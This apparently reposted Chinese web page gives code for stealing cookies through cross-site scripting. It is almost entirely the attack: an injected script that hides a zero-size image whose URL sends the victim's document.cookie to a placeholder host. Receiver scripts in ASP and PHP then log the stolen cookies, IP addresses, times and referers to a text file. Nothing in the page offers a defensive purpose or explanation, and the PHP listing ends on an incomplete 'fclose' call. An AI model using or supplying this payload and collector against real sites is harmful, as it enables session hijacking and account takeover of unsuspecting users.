首页 > 系统服务 > 详细

asp php XSS获取cookie的代码

时间:2016-02-07 10:53:26      阅读:161      评论:0      收藏:0      [点我收藏+]
<script>document.write(‘<img src="http://url/news.asp?msg=‘+document.cookie+‘" width=0 height=0 border=0 />‘);</script>
news.asp代码:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>

PHP版代码:
<?php
$cookie = $_GET[‘c‘];
$ip = getenv (‘REMOTE_ADDR‘);
$time=date("j F, Y, g:i a");
$referer=getenv (‘HTTP_REFERER‘);
$fp = fopen(‘cook.txt‘, ‘a‘);
fwrite($fp, ‘Cookie: ‘.$cookie.‘<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘

.$time. ‘<br> Referer: ‘.$referer.‘<br><br><br>‘);
fclose
?>

asp php XSS获取cookie的代码

原文:http://www.jb51.net/hack/12901.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!